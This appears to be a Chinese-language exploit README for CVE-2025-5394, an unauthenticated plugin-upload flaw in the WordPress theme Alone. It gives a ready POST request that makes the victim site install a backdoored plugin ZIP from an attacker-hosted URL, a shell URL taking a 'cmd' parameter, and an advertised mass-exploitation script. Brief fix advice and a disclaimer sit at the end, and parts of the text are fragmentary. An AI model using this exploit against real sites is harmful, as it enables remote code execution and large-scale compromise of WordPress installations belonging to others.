🔥 漏洞概述
WordPress 主题 Alone 版本 <= 7.8.3 存在未认证任意文件上传漏洞。该缺陷允许未认证攻击者通过一个未受保护的 AJAX 端点从远程 URL 上传并安装任意插件 ZIP 文件——从而通过部署后门插件实现远程代码执行(RCE)。
该漏洞源于 beplus_import_pack_install_plugin 函数,该函数通过 wp_ajax_nopriv_ 公开暴露,且没有任何身份验证或权限检查。该函数会从用户提供的 URL 安装并激活插件。
🔍 受影响主题
🧪 漏洞利用功能
/wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin🧠 研究人员
🚀 使用方法
准备一个托管在你控制的服务器上的恶意插件 ZIP 文件。
Plugin Name:)和 PHP 后门(例如 bk.php)构造以下 POST 请求:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
action=beplus_import_pack_install_plugin&
data[plugin_slug]=hello-dolly&
data[plugin_source]=https://attacker.com/hello-dolly.zip
如果成功,插件将被安装并激活。通过以下地址访问你的 shell:
https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id
🧰 批量利用脚本 本仓库包含一个批量利用工具,具有以下功能:
result.txt🛠 修复建议
wp_ajax_nopriv_beplus_import_pack_install_plugin 钩子。current_user_can('install_plugins'))🔒 免责声明:
此信息仅用于教育和授权安全测试目的。未经授权访问或使用计算机系统是非法且不道德的。
📚 参考资料:
CVE: CVE-2025-5394
研究人员: Thai An